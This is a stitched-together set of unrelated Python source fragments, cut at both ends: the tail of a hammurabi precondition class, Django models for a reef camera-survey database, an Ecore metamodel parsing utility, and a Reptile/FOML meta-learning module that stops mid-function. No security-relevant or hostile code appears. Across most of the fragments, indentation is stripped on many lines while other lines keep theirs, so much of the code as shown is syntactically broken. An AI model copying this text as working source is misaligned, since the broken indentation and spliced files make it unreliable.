if self.name.endswith("precondition"):
return self.name
return f"{self.name} precondition"
@abstractmethod
def task(self) -> bool:
"""
Abstract method representing how a :func:`hammurabi.rules.base.Precondition.task`
must be parameterized. Any difference in the parameters or return type will result
in pylint/mypy errors.
        Unlike ordinary rules, a precondition's task does not feed ``pipe`` or
        ``children``; it simply reports whether the precondition holds.
        :return: True if the precondition is fulfilled, otherwise False
        :rtype: bool
"""
def execute(self) -> bool:
"""
Execute the precondition.
        :raise: ``AssertionError``
        :return: result of the precondition's ``task``
        :rtype: bool
"""
logging.info('Running task for "%s"', self.name)
self.pre_task_hook()
result = self.task()
self.post_task_hook()
return result
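if __name__ == "__main__":
    # Minimal usage sketch (illustration only, not part of the hammurabi API):
    # a precondition which passes when its parameter is truthy. It assumes the
    # pre/post task hooks inherited from AbstractRule are no-ops by default.
    class HasParam(Precondition):
        def task(self) -> bool:
            return bool(self.param)
    print(HasParam(param="anything").execute())  # expected: True
    print(HasParam(param=None).execute())        # expected: False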
|
from decimal import Decimal
from collections import Counter
from django.contrib.gis.db import models
from django.core.validators import MinValueValidator, MaxValueValidator
from django.core.urlresolvers import reverse
from django.contrib.gis.geos import Point
from global_finprint.annotation.models.observation import Observation, MasterRecord
from global_finprint.annotation.models.video import Video, Assignment
from global_finprint.core.version import VersionInfo
from global_finprint.core.models import AuditableModel
from global_finprint.trip.models import Trip
from global_finprint.habitat.models import ReefHabitat, Substrate, SubstrateComplexity
from mptt.models import MPTTModel, TreeForeignKey
from django.contrib.postgres.fields import ArrayField, JSONField
# todo: move some of these out to the db?
EQUIPMENT_BAIT_CONTAINER = (
    ('B', 'Bag'),
    ('C', 'Cage'),
)
CURRENT_DIRECTION = (
    ('N', 'North'),
    ('NE', 'Northeast'),
    ('E', 'East'),
    ('SE', 'Southeast'),
    ('S', 'South'),
    ('SW', 'Southwest'),
    ('W', 'West'),
    ('NW', 'Northwest'),
)
TIDE_CHOICES = (
    ('F', 'Flood'),
    ('E', 'Ebb'),
    ('S', 'Slack'),
    ('S2F', 'Slack to Flood'),
    ('S2E', 'Slack to Ebb'),
)
SURFACE_CHOP_CHOICES = (
    ('L', 'Light'),
    ('M', 'Medium'),
    ('H', 'Heavy'),
)
BAIT_TYPE_CHOICES = (
    ('CHP', 'Chopped'),
    ('CRS', 'Crushed'),
    ('WHL', 'Whole'),
)
VISIBILITY_CHOICES = (
    ('V0-2', 'V0-2'),
    ('V2-4', 'V2-4'),
    ('V4-6', 'V4-6'),
    ('V6-8', 'V6-8'),
    ('V8-10', 'V8-10'),
    ('V10+', 'V10+'),
)
FIELD_OF_VIEW_CHOICES = (
    ('FU', 'Facing Up'),
    ('FD', 'Facing Down'),
    ('L', 'Limited'),
    ('O', 'Open'),
)
class BaitContainer(models.Model):
# starting seed: cage, bag
type = models.CharField(max_length=32)
def __str__(self):
return u"{0}".format(self.type)
class FrameType(models.Model):
# starting seed: rebar, stainless rebar, PVC, mixed
type = models.CharField(max_length=32)
image = models.ImageField(null=True, blank=True)
def __str__(self):
return u"{0}".format(self.type)
class Equipment(AuditableModel):
camera = models.CharField(max_length=32)
stereo = models.BooleanField(default=False)
frame_type = models.ForeignKey(to=FrameType)
container = models.ForeignKey(to=BaitContainer)
arm_length = models.PositiveIntegerField(null=True, help_text='centimeters')
camera_height = models.PositiveIntegerField(null=True, help_text='centimeters')
def __str__(self):
return u"{0} / {1} / {2}{3}".format(self.frame_type.type,
self.container.type,
self.camera, ' (Stereo)' if self.stereo else '')
class Meta:
verbose_name_plural = "Equipment"
ordering = ['frame_type__type', 'container__type', 'camera']
class EnvironmentMeasure(AuditableModel):
water_temperature = models.DecimalField(null=True, blank=True,
max_digits=4, decimal_places=1,
help_text='C') # C
salinity = models.DecimalField(null=True, blank=True,
max_digits=4, decimal_places=2,
help_text='ppt') # ppt .0
conductivity = models.DecimalField(null=True, blank=True,
max_digits=8, decimal_places=2,
help_text='S/m') # S/m .00
dissolved_oxygen = models.DecimalField(null=True, blank=True,
max_digits=8, decimal_places=1)
current_flow = models.DecimalField(null=True, blank=True,
max_digits=5, decimal_places=2,
help_text='m/s') # m/s .00
current_direction = models.CharField(max_length=2,
null=True, blank=True,
choices=CURRENT_DIRECTION,
help_text='compass direction') # eight point compass
tide_state = models.CharField(max_length=3,
null=True, blank=True,
choices=TIDE_CHOICES)
estimated_wind_speed = models.IntegerField(null=True, blank=True, help_text='Beaufort')
measured_wind_speed = models.IntegerField(null=True, blank=True, help_text='kts')
wind_direction = models.CharField(max_length=2,
null=True, blank=True,
choices=CURRENT_DIRECTION,
help_text='compass direction') # eight point compass
cloud_cover = models.IntegerField(null=True, blank=True, help_text='%') # percentage
surface_chop = models.CharField(max_length=1,
null=True, blank=True,
choices=SURFACE_CHOP_CHOICES)
def __str__(self):
        return u'Env measure for {0}'.format(self.set)
class Bait(AuditableModel):
description = models.CharField(max_length=32, help_text='1kg')
type = models.CharField(max_length=3, choices=BAIT_TYPE_CHOICES)
oiled = models.BooleanField(default=False, help_text='20ml menhaden oil')
def __str__(self):
return u'{0} {1}{2}'.format(self.get_type_display(), self.description, ' (m)' if self.oiled else '')
class Meta:
unique_together = ('description', 'type', 'oiled')
# helper for SetTag.get_choices: recursively flatten arbitrarily nested lists (python has no builtin for this)
def flatten(x):
if type(x) is list:
return [a for i in x for a in flatten(i)]
else:
return [x]
class SetTag(MPTTModel):
name = models.CharField(max_length=50, unique=True)
description = models.TextField(null=True, blank=True)
active = models.BooleanField(
default=True,
help_text='overridden if parent is inactive')
parent = TreeForeignKey('self', null=True, blank=True, related_name='children', db_index=True)
class MPTTMeta:
order_insertion_by = ['name']
def __str__(self):
return u"{0}".format(self.name)
@classmethod
def get_choices(cls, node=None):
if node is None:
nodes = [cls.get_choices(node=node) for node in cls.objects.filter(parent=None, active=True)]
return [(node.pk, node.name) for node in flatten(nodes)]
elif node.is_leaf_node():
return node
else:
return [node] + [cls.get_choices(node=node) for node in node.get_children().filter(active=True)]
class BenthicCategory(MPTTModel):
name = models.CharField(max_length=50, unique=True)
description = models.TextField(null=True, blank=True)
active = models.BooleanField(
default=True,
help_text='overridden if parent is inactive')
parent = TreeForeignKey('self', null=True, blank=True, related_name='children', db_index=True)
class MPTTMeta:
order_insertion_by = ['name']
def __str__(self):
return u"{0}".format(self.name)
class Meta:
verbose_name_plural = 'benthic categories'
class Set(AuditableModel):
# suggested code pattern:
# [site.code][reef.code]_[set number within reef]
code = models.CharField(max_length=32, db_index=True, help_text='[site + reef code]_xxx', null=True, blank=True)
set_date = models.DateField()
coordinates = models.PointField(null=True)
latitude = models.DecimalField(max_digits=12, decimal_places=8)
longitude = models.DecimalField(max_digits=12, decimal_places=8)
drop_time = models.TimeField()
haul_date = models.DateField(null=True, blank=True)
haul_time = models.TimeField(null=True, blank=True)
depth = models.DecimalField(help_text='m', decimal_places=2, max_digits=12,
validators=[MinValueValidator(Decimal('0.01'))])
comments = models.TextField(null=True, blank=True)
message_to_annotators = models.TextField(null=True, blank=True)
tags = models.ManyToManyField(to=SetTag)
current_flow_estimated = models.CharField(max_length=50, null=True, blank=True, help_text='H, M, L')
current_flow_instrumented = models.DecimalField(null=True, blank=True,
max_digits=5, decimal_places=2,
help_text='m/s') # m/s .00
bruv_image_url = models.CharField(max_length=200, null=True, blank=True)
splendor_image_url = models.CharField(max_length=200, null=True, blank=True)
benthic_category = models.ManyToManyField(BenthicCategory, through='BenthicCategoryValue')
# new fields
substrate_relief_mean = models.DecimalField(null=True, blank=True, decimal_places=4, max_digits=12)
substrate_relief_sd = models.DecimalField(null=True, blank=True, decimal_places=4, max_digits=12)
visibility = models.CharField(db_column='visibility_str', max_length=10, null=True, blank=True, choices=VISIBILITY_CHOICES)
field_of_view = models.CharField(max_length=10, null=True, blank=True, choices=FIELD_OF_VIEW_CHOICES)
custom_field_value = JSONField(db_column='custom_fields', null=True)
# todo: need some form changes here ...
bait = models.ForeignKey(Bait, null=True)
equipment = models.ForeignKey(Equipment)
reef_habitat = models.ForeignKey(ReefHabitat, blank=True)
trip = models.ForeignKey(Trip)
drop_measure = models.OneToOneField(
EnvironmentMeasure,
on_delete=models.CASCADE,
null=True,
related_name='drop_parent_set')
haul_measure = models.OneToOneField(
EnvironmentMeasure,
on_delete=models.CASCADE,
null=True,
related_name='haul_parent_set')
video = models.OneToOneField(
Video,
on_delete=models.CASCADE,
null=True,
related_name='set'
)
bulk_loaded = models.BooleanField(default=False)
class Meta:
unique_together = ('trip', 'code')
@property
def environmentmeasure_set(self):
return [x for x in [self.haul_measure, self.drop_measure] if x is not None]
@property
def next_by_code(self):
return self.trip.get_next_set_by_code(self.code)
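    # Note on save(): the set code is generated in two phases. The first save stores a
    # placeholder of the form '<site code><reef code>_xxx'; once the row exists, the
    # '_xxx' suffix is replaced with a zero-padded count of sets for this trip/reef
    # (e.g. a hypothetical 'ABCR_003' for the third set) and the row is saved again.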
def save(self, *args, **kwargs):
# todo: we're assuming the input is latitude & longitude! this should be checked!
self.coordinates = Point(float(self.longitude), float(self.latitude))
if not self.code: # set code if it hasn't been set
self.code = u'{}{}_xxx'.format(self.reef().site.code, self.reef().code)
super(Set, self).save(*args, **kwargs)
self.refresh_from_db()
if self.code == u'{}{}_xxx'.format(self.reef().site.code, self.reef().code):
next_id = str(len(Set.objects.filter(trip=self.trip, reef_habitat__reef=self.reef()))).zfill(3)
self.code = self.code.replace('_xxx', u'_{}'.format(next_id))
super(Set, self).save(*args, **kwargs)
def reef(self):
return self.reef_habitat.reef
def get_absolute_url(self):
return reverse('set_update', args=[str(self.id)])
def observations(self):
if self.video:
return Observation.objects.filter(assignment__in=self.video.assignment_set.all())
def habitat_filename(self, image_type):
server_env = VersionInfo.get_server_env()
return '/{0}/{1}/{2}/{3}.png'.format(server_env,
self.trip.code,
self.code,
image_type)
# todo: "property-ize" this?
def master(self, project=1):
try:
return MasterRecord.objects.get(set=self, project_id=project)
except MasterRecord.DoesNotExist:
return None
def assignment_counts(self, project=1):
status_list = {'Total': 0}
if self.video:
status_list.update(Counter(Assignment.objects.filter(
video=self.video, project=project).values_list('status__id', flat=True)))
status_list['Total'] = sum(status_list.values())
return status_list
    def required_fields(self):
        # todo: make this data-driven rather than hard-coded field choices
        # fields considered "required":
        # 1) visibility
        # 2) current flow (either estimated or instrumented)
        # 3) substrate (not yet enforced by the check below)
        # 4) substrate complexity (not yet enforced by the check below)
return bool(self.visibility
and (self.current_flow_estimated or self.current_flow_instrumented))
def completed(self):
# we consider the following for "completion":
# 1) complete annotations have been promoted into a master
# 2) a master annotation record has been completed
# 3) other 'required' fields have been completed (see above)
master = self.master()
return master \
and (master.status.is_finished) \
and self.required_fields()
def __str__(self):
return u"{0}_{1}".format(self.trip.code, self.code)
class BenthicCategoryValue(models.Model):
set = models.ForeignKey(Set)
benthic_category = TreeForeignKey(BenthicCategory)
value = models.IntegerField()
|
'''
Created on 2015-02-16
@author: levi
'''
from xml.dom import minidom
from copy import deepcopy
from core.himesis_utils import graph_to_dot
from collections import defaultdict
class EcoreUtils(object):
'''
a set of utils to deal with ecore files
'''
def __init__(self, xmlfileName):
'''
Constructor
'''
self.debug = False
if self.debug:
print("Parsing: " + xmlfileName)
self.xmldoc = None
try:
self.xmldoc = minidom.parse(xmlfileName)
except FileNotFoundError:
raise FileNotFoundError("Metamodel file not found: " + xmlfileName + "\nWas the metamodel placed in the 'SyVOLT/eclipse_integration/metamodels/' folder?")
self.inheritanceRels = self.getSuperClassInheritanceRelationForClasses()
self.containmentRels = []
self.mmClassParents = self.getSuperClassInheritanceRelationForClasses()
self.mmClassChildren = self.getSubClassInheritanceRelationForClasses()
self.classes = []
self.rels = defaultdict(list)
self.attribs = {}
self.containmentLinks = {}
self.metamodelClasses = self.xmldoc.getElementsByTagName('eClassifiers')
# first get a dictionary with all the metamodel classes that have containment relations towards them.
# several containment relations can exist towards the same metamodel class.
# also keep a list of all containment relations in the metamodel.
debug_rels = False
debug_contain_links = False
for mmClass in self.metamodelClasses:
mmClassName = mmClass.attributes['name'].value
self.classes.append(mmClassName)
rels = mmClass.getElementsByTagName('eStructuralFeatures')
for rel in rels:
targetClassName = str(rel.attributes['eType'].value).split('#//', 1)[1]
relName = str(rel.attributes['name'].value)
isAttrib = "EAttribute" in str(rel.attributes['xsi:type'].value)
if isAttrib:
# record this attrib
if mmClassName not in self.attribs.keys():
self.attribs[mmClassName] = [relName]
else:
self.attribs[mmClassName].append(relName)
else:
relTuple = (mmClassName, relName)
if 'containment' in rel.attributes and str(rel.attributes['containment'].value) == "true":
if targetClassName not in self.containmentLinks.keys():
self.containmentLinks[targetClassName] = [relTuple]
else:
if rel not in self.containmentLinks[targetClassName]:
self.containmentLinks[targetClassName].append(relTuple)
self.containmentRels.append(relName)
#record this relation
if relTuple not in self.rels[targetClassName]:
self.rels[targetClassName].append(relTuple)
if debug_rels:
print("\nLinks:")
for k, v in sorted(self.rels.items()):
print(str(k) + ":" + str(v))
if debug_contain_links:
print("\nContain links:")
for k, v in sorted(self.containmentLinks.items()):
print(str(k) + ":" + str(v))
#raise Exception()
def getMetamodelClassNames(self):
'''
Get a list with all the names of the classes in the ecore metamodel file.
Discard duplicates.
TODO: For the time being does not care about inheritance relations.
'''
classNameList = self.xmldoc.getElementsByTagName('eClassifiers')
return [str(item.attributes['name'].value) for item in classNameList]
def getMetamodelContainmentLinks(self):
'''
Get all the containment links in a metamodel.
'''
containmentLinkList = self.xmldoc.getElementsByTagName('eStructuralFeatures')
containmentReferences = []
for element in containmentLinkList:
try:
if element.attributes.item(4).value == "true":
containmentReferences.append(str(element.attributes['name'].value))
except Exception:
pass
return containmentReferences
def buildContainmentDependenciesForClass(self, targetClass):
'''
auxiliary, build all containment relations for a class, recursively
'''
metamodelClasses = self.xmldoc.getElementsByTagName('eClassifiers')
res = []
for sourceClass in metamodelClasses:
rels = sourceClass.getElementsByTagName('eStructuralFeatures')
containmentRels = []
for rel in rels:
try:
if str(rel.attributes['containment'].value) == "true":
containmentRels.append(rel)
except Exception:
pass
for cRel in containmentRels:
trgtClassName = str(cRel.attributes['eType'].value).split('#//', 1)[1]
srcClassName = str(sourceClass.attributes['name'].value)
# do not consider self loops in the containment classes, because they do not help with reaching the root
# TODO: containment loops could involve more than one class (e.g. A contains B contains C contains A). This case is not yet treated.
if trgtClassName == str(targetClass.attributes['name'].value) and not (trgtClassName == srcClassName):
#return [str(cRel.attributes['name'].value)].extend(self.buildContainmentDependenciesForClass(sourceClass))
res.extend([(srcClassName, str(cRel.attributes['name'].value), trgtClassName)])
res.extend(self.buildContainmentDependenciesForClass(sourceClass))
return res
def getContainmentLinksForClasses(self):
'''
get all containment relations for the classes in the metamodel
'''
allContainmentRels = {}
metamodelClasses = self.xmldoc.getElementsByTagName('eClassifiers')
for mmClass in metamodelClasses:
allContainmentRels[str(mmClass.attributes['name'].value)] = self.buildContainmentDependenciesForClass(mmClass)
# now add to the existing containment relations for a class the containment relations of its supertypes
containmentRelsWithSuper = {}
for mmClassName in allContainmentRels.keys():
containmentRelsToAdd = []
if mmClassName in self.inheritanceRels.keys():
for superTypeName in self.inheritanceRels[mmClassName]:
if superTypeName in allContainmentRels.keys():
for containmentLink in allContainmentRels[superTypeName]:
containmentRelsToAdd.append((containmentLink[0], containmentLink[1], mmClassName))
res = allContainmentRels[mmClassName]
res.extend(containmentRelsToAdd)
containmentRelsWithSuper[mmClassName] = list(set(res))
return containmentRelsWithSuper
def buildInheritanceDependenciesForClass(self, mmClassNames):
'''
build a list of all parents of the given class
'''
metamodelClasses = self.xmldoc.getElementsByTagName('eClassifiers')
mmClassesToTreat = []
for mmClass in metamodelClasses:
for mmClassName in mmClassNames:
if mmClassName == str(mmClass.attributes['name'].value):
mmClassesToTreat.append(mmClass)
break
parentNames = []
for mmClass in mmClassesToTreat:
superTypeNames = []
try:
superTypeNames = str(mmClass.attributes['eSuperTypes'].value)
superTypeNames = superTypeNames.replace(" ", "")
superTypeNames = superTypeNames[3:]
superTypeNames = superTypeNames.split('#//')
except Exception:
pass
# parentClass = None
# for mmClass2 in metamodelClasses:
# if str(mmClass.attributes['name'].value) == superTypeName:
# parentClass = mmClass2
parentNames.extend(superTypeNames)
if parentNames:
parentNames.extend(self.buildInheritanceDependenciesForClass(parentNames))
return list(set(parentNames))
def getSuperClassInheritanceRelationForClasses(self):
'''
build a dictionary where the key is the name of the metamodel class and the
value is the list of parents of that class
'''
inheritanceRel = {}
metamodelClasses = self.xmldoc.getElementsByTagName('eClassifiers')
for mmClass in metamodelClasses:
superTypeNames = []
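            # The eSuperTypes attribute holds space-separated local references,
            # typically of the form "#//ClassA #//ClassB". Removing spaces, dropping
            # the leading "#//" via the [3:] slice and splitting on "#//" leaves the
            # plain parent class names, e.g. ["ClassA", "ClassB"].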
try:
superTypeNames = str(mmClass.attributes['eSuperTypes'].value)
superTypeNames = superTypeNames.replace(" ", "")
superTypeNames = superTypeNames[3:]
superTypeNames = superTypeNames.split('#//')
except Exception:
pass
if superTypeNames != []:
superTypeNames.extend(self.buildInheritanceDependenciesForClass(superTypeNames))
inheritanceRel[str(mmClass.attributes['name'].value)] = superTypeNames
else:
inheritanceRel[str(mmClass.attributes['name'].value)] = []
return inheritanceRel
def getSubClassInheritanceRelationForClasses(self):
'''
build a dictionary where the key is the name of the metamodel class and the
value is the list of children of that class
'''
subClasses = {}
superClasses = self.getSuperClassInheritanceRelationForClasses()
for childClassName in superClasses.keys():
for parentClassName in superClasses[childClassName]:
if parentClassName not in subClasses.keys():
subClasses[parentClassName] = [childClassName]
else:
subClasses[parentClassName].append(childClassName)
return subClasses
def inheritsFrom(self, subtype, supertype):
'''
quick and dirty method to check whether a class inherits from another
'''
if subtype == supertype: return True
if subtype in self.inheritanceRels:
if supertype in self.inheritanceRels[subtype]:
return True
return False
def getBuiltClasses(self, pathCond):
classesInOuputMM = self.getMetamodelClassNames()
classesBuiltByPC = []
for node in range(len(pathCond.vs)):
if pathCond.vs[node]["mm__"] in classesInOuputMM:
instanceIsProduced = True
inputClassNodes = pathCond.neighbors(pathCond.vs[node],1)
for inputClassNode in inputClassNodes:
if pathCond.vs[inputClassNode]["mm__"] == "backward_link":
instanceIsProduced = False
break
if instanceIsProduced:
classesBuiltByPC.append(pathCond.vs[node]["mm__"])
return classesBuiltByPC
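    # Example of the return shape of getBuiltContainmentLinks (hypothetical metamodel):
    #   {'Transition': [('StateMachine', 'transitions')]}
    # i.e. the rule builds the containment link 'transitions' from a StateMachine
    # node to a Transition node.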
def getBuiltContainmentLinks(self, rule):
'''
return all the containment relations built by a rule, in the form of a
dictionary having as key the name of the target classes and as elements a list
with the containment relation(s).
'''
containmentRelsInRule = {}
# now check which relations in the rule are built by which containment relation
mms = rule.vs["mm__"]
attr1s = rule.vs["attr1"]
for node in range(rule.vcount()):
# if rule.vs[node]["mm__"] == "directLink_T":
# print("................ Containment link: " + rule.vs[node]["attr1"])
# print("................ self.containmentRels: " + str(self.containmentRels))
if mms[node] == "directLink_T" and attr1s[node] in self.containmentRels:
# find the types of the source and the target elements of the containment in the rule
neighbours_out = rule.neighbors(node, 1)
neighbours_in = rule.neighbors(node, 2)
targetClassName = mms[neighbours_out[0]]
sourceClassName = mms[neighbours_in[0]]
link = (sourceClassName, attr1s[node])
try:
if link not in containmentRelsInRule[targetClassName]:
containmentRelsInRule[targetClassName].append(link)
except KeyError:
containmentRelsInRule[targetClassName] = [link]
return containmentRelsInRule
def getMissingContainmentLinks(self, rule):
'''
return all missing containment relations in a rule, in the form of a
dictionary having as key the targetClass and as data the containmentLinks that
can be used to build the missing containment link.
'''
debug = False
# if "HExitPoint2BProcDefWhetherOrNotExitPtHasOutgoingTrans" in rule.name or "3R0" in rule.name:
# debug = True
# print("\nExamining: " + rule.name)
if debug:
print("===========================")
print("Examining: " + rule.name)
missingContainmentLinks = {}
try:
mms = rule.vs["mm__"]
except KeyError:
return {}
#print("Rule Name: " + pathCond.name)
for node in range(len(mms)):
targetClassName = mms[node]
if targetClassName in ["trace_link", "MatchModel", "ApplyModel", "paired_with", "directLink_S", "directlink_T"]:
continue
class_inheri = [targetClassName]
try:
class_inheri += self.mmClassParents[targetClassName]
except KeyError:
pass
has_links = False
for cl in class_inheri:
if cl in self.containmentLinks.keys():
has_links = True
if not has_links:
continue
if debug:
print("\nTarget Class: " + targetClassName)
skip_match_nodes = False
neighbours_in = rule.neighbors(node, 2)
for n in neighbours_in:
if mms[n] in ["MatchModel", "match_contains"]:
skip_match_nodes = True
break
if skip_match_nodes:
continue
for cl in class_inheri:
if cl in self.containmentLinks:
if debug:
print("\tClassname: " + str(cl) + ":")
for containLink in self.containmentLinks[cl]:
if debug:
print("\t\t" + str(containLink))
try:
if containLink not in missingContainmentLinks[targetClassName]:
missingContainmentLinks[targetClassName].append(containLink)
except KeyError:
missingContainmentLinks[targetClassName] = [containLink]
if debug:
if len(missingContainmentLinks) > 0:
print("Missing containment links:")
for link in missingContainmentLinks:
print(link + " : " + str(missingContainmentLinks[link]))
#raise Exception()
return missingContainmentLinks
if __name__ == '__main__':
from ATLTrans.HUnionMotherRule import HUnionMotherRule
pathCond = HUnionMotherRule()
t1 = EcoreUtils("../UMLRT2Kiltera_MM/metamodels/rt_new.ecore")
# t1 = EcoreUtils("../eclipse_integration/examples/families_to_persons/metamodels/Community.ecore")
# t1 = EcoreUtils("./mbeddr2C_MM/ecore_metamodels/Module.ecore")
# r1 = t1.getMetamodelContainmentLinks()
# r2 = t2.getMetamodelContainmentLinks()
# print(r1)
# print(r2)
# print(str(t1.buildInheritanceDependenciesForClass(["IN1"])))
# print (str(t1.mmClassContained))
|
"""
Supervised Reptile learning and evaluation on arbitrary
datasets.
"""
import random
import tensorflow as tf
import numpy as np
from variables import (interpolate_vars, average_vars, subtract_vars, add_vars, scale_vars,
VariableState)
class Reptile:
"""
A meta-learning session.
Reptile can operate in two evaluation modes: normal
and transductive. In transductive mode, information is
allowed to leak between test samples via BatchNorm.
Typically, MAML is used in a transductive manner.
"""
def __init__(self, session, graph, variables=None, transductive=False, pre_step_op=None):
self.session = session
        # VariableState creates placeholders and assign ops for each variable,
        # letting you export and restore variable values
self._model_state = VariableState(self.session, graph, variables or tf.trainable_variables())
global_vars = tf.get_collection(tf.GraphKeys.GLOBAL_VARIABLES)
self._full_state = VariableState(self.session, graph, global_vars)
self._transductive = transductive
self._pre_step_op = pre_step_op
# pylint: disable=R0913,R0914
    # TODO: may need to modify for few-shot imitation learning to account for the imitation
    # meaning of num_classes / num_shots:
    # num_classes (number of tasks sampled per outer loop), num_shots (number of demonstrations per task)
def train_step(self,
dataset,
state_ph,
obs_ph,
label_ph,
minimize_op,
loss_op,
writer,
num_classes,
num_shots,
inner_batch_size,
inner_iters,
step,
meta_step_size,
meta_batch_size):
"""
Perform a Reptile training step.
Args:
dataset: a sequence of data classes, where each data
class has a sample(n) method.
          state_ph: placeholder for a batch of states.
          obs_ph: placeholder for a batch of observations (gifs).
          label_ph: placeholder for a batch of labels (actions).
          minimize_op: TensorFlow Op to minimize a loss on the
            batch specified by the placeholders above.
          loss_op: TensorFlow Op evaluating the loss on that batch.
          writer: summary writer used to record the average loss at the given step.
num_classes: number of data classes to sample.
num_shots: number of examples per data class.
inner_batch_size: batch size for every inner-loop
training iteration.
inner_iters: number of inner-loop iterations.
meta_step_size: interpolation coefficient.
meta_batch_size: how many inner-loops to run.
"""
old_vars = self._model_state.export_variables()
new_vars = []
losses = []
print('taking train step')
for _ in range(meta_batch_size):
# sample n classes and k+1 examples from each class
# k*n for training and 1*n for testing
mini_dataset = _sample_mini_dataset_mil(dataset, num_classes, num_shots)
# for each task in the mini_dataset
for batch in _mini_batches(mini_dataset, inner_batch_size, inner_iters):
gifs = np.concatenate([t[0] for t in batch], axis=0)
states = np.concatenate([t[1] for t in batch], axis=0)
actions = np.concatenate([t[2] for t in batch], axis=0)
if self._pre_step_op:
self.session.run(self._pre_step_op)
# take a gradient step
feed_dict = {state_ph: states, obs_ph : gifs, label_ph: actions}
print('taking gradient step')
_, loss = self.session.run([minimize_op, loss_op], feed_dict=feed_dict)
                print('took gradient step on loss:', loss)
losses.append(loss)
# store the new variables
new_vars.append(self._model_state.export_variables())
self._model_state.import_variables(old_vars)
# update old variables
new_vars = average_vars(new_vars)
self._model_state.import_variables(interpolate_vars(old_vars, new_vars, meta_step_size))
# add loss summary
summary = tf.Summary()
print('ave loss:', np.mean(losses))
summary.value.add(tag='ave_loss', simple_value=np.mean(losses))
writer.add_summary(summary, step)
def evaluate(self,
dataset, # (train_example, test_example)
state_ph,
obs_ph,
label_ph,
minimize_op,
predictions, # not using predictions for now
num_classes,
num_shots,
inner_batch_size,
inner_iters):
"""
Run a single evaluation of the model.
Samples a few-shot learning task and measures
performance.
Args:
          dataset: a (train_example, test_example) pair, where train_example is
            a (states, observations, actions) tuple and test_example is a
            (states, observations) tuple.
          state_ph: placeholder for a batch of states.
          obs_ph: placeholder for a batch of observations (gifs).
          label_ph: placeholder for a batch of labels (actions).
          minimize_op: TensorFlow Op to minimize a loss on the
            batch specified by the placeholders above.
          predictions: a Tensor of predicted actions.
num_classes: number of data classes to sample.
num_shots: number of examples per data class.
inner_batch_size: batch size for every inner-loop
training iteration.
inner_iters: number of inner-loop iterations.
Returns:
          The predicted action(s) for the test example, computed after the
          inner-loop adaptation steps.
"""
# get train and test split, assuming that test is always one example from each class
# we know that we only use two examples so ignore this
#train_set, test_set = _split_train_test(
# _sample_mini_dataset(dataset, num_classes, num_shots+1))
train_example, test_example = dataset
statea, obsa, actiona = train_example
train_feed_dict = {
state_ph : statea,
obs_ph : obsa,
label_ph : actiona
}
#print('statea:', statea.shape, 'obsa:', obsa.shape, 'actiona:', actiona.shape)
stateb, obsb = test_example
test_feed_dict = {
state_ph : stateb,
obs_ph : obsb
}
#print('stateb:', stateb.shape, 'obsb:', obsb.shape)
# save model variables for update
old_vars = self._full_state.export_variables()
# removed for reptile
#for batch in _mini_batches(train_set, inner_batch_size, inner_iters):
# inputs, labels = zip(*batch)
for i in range(inner_iters):
if self._pre_step_op:
self.session.run(self._pre_step_op)
self.session.run(minimize_op, feed_dict=train_feed_dict)
# compute predicted values for the newly trained model
# TODO: should the data be passed in together for some reason?
# test_preds = self._test_predictions(train_set, test_set, input_ph, predictions)
# num_correct = sum([pred == sample[1] for pred, sample in zip(test_preds, test_set)])
# try non-transductive procedure
        if not self._transductive:  # there appears to be a very small difference when using this option
all_state, all_obs = np.concatenate([statea, stateb], axis=0), np.concatenate([obsa, obsb], axis=0)
action = self.session.run(predictions, feed_dict={state_ph : all_state, obs_ph : all_obs})
action = action[-1]
else:
action = self.session.run(predictions, feed_dict=test_feed_dict)
# reset back to the old variables for the next evaluation
self._full_state.import_variables(old_vars)
#return num_correct
return action
# TODO: figure out if we should evaluate transductively
def _test_predictions(self, train_set, test_set, input_ph, predictions):
if self._transductive:
inputs, _ = zip(*test_set)
return self.session.run(predictions, feed_dict={input_ph: inputs})
res = []
for test_sample in test_set:
inputs, _ = zip(*train_set)
inputs += (test_sample[0],) # this passes in the training set and the test set?
res.append(self.session.run(predictions, feed_dict={input_ph: inputs})[-1])
return res
class FOML(Reptile):
"""
A basic implementation of "first-order MAML" (FOML).
FOML is similar to Reptile, except that you use the
gradient from the last mini-batch as the update
direction.
There are two ways to sample batches for FOML.
By default, FOML samples batches just like Reptile,
meaning that the final mini-batch may overlap with
the previous mini-batches.
Alternatively, if tail_shots is specified, then a
separate mini-batch is used for the final step.
This final mini-batch is guaranteed not to overlap
with the training mini-batches.
"""
    def __init__(self, *args, tail_shots=None, **kwargs):
"""
Create a first-order MAML session.
Args:
args: args for Reptile.
tail_shots: if specified, this is the number of
examples per class to reserve for the final
mini-batch.
kwargs: kwargs for Reptile.
"""
super(FOML, self).__init__(*args, **kwargs)
self.tail_shots = tail_shots
# pylint: disable=R0913,R0914
def train_step(self,
dataset,
input_ph,
label_ph,
minimize_op,
num_classes,
num_shots,
inner_batch_size,
inner_iters,
meta_step_size,
meta_batch_size):
old_vars = self._model_state.export_variables()
updates = []
for _ in range(meta_batch_size):
mini_dataset = _sample_mini_dataset(dataset, num_classes, num_shots)
for batch in self._mini_batches(mini_dataset, inner_batch_size, inner_iters):
inputs, labels = zip(*batch)
last_backup = self._model_state.export_variables()
if self._pre_step_op:
self.session.run(self._pre_step_op)
self.session.run(minimize_op, feed_dict={input_ph: inputs, label_ph: labels})
updates.append(subtract_vars(self._model_state.export_variables(), last_backup))
self._model_state.import_variables(old_vars)
update = average_vars(updates)
self._model_state.import_variables(add_vars(old_vars, scale_vars(update, meta_step_size)))
def _mini_batches(self, mini_dataset, inner_batch_size, inner_iters):
"""
Generate inner-loop mini-batches for the task.
"""
if self.tail_shots is None:
for value in _mini_batches(mini_dataset, inner_batch_size, inner_iters):
yield value
return
train, tail = _split_train_test(mini_dataset, test_shots=self.tail_shots)
for batch in _mini_batches(train, inner_batch_size, inner_iters - 1):
yield batch
yield tail
def _sample_mini_dataset_mil(dataset, num_classes, num_shots):
"""
Sample a few shot task from a dataset.
Returns:
An iterable of (input, label) pairs.
"""
shuffled = list(dataset)
random.shuffle(shuffled)
for class_idx, class_obj in enumerate(shuffled[:num_classes]):
gifs, states, actions = class_obj.sample(num_shots)
for shot_idx in range(num_shots):
start_idx, end_idx = shot_idx*class_obj.T, (shot_idx + 1)*class_obj.T
g, s, a = gifs[start_idx:end_idx], states[start_idx:end_idx], actions[start_idx:end_idx]
yield (g, s, a)
def _sample_mini_dataset(dataset, num_classes, num_shots):
"""
Sample a few shot task from a dataset.
Returns:
An iterable of (input, label) pairs.
"""
shuffled = list(dataset)
random.shuffle(shuffled)
for class_idx, class_obj in enumerate(shuffled[:num_classes]):
for sample in class_obj.sample(num_shots):
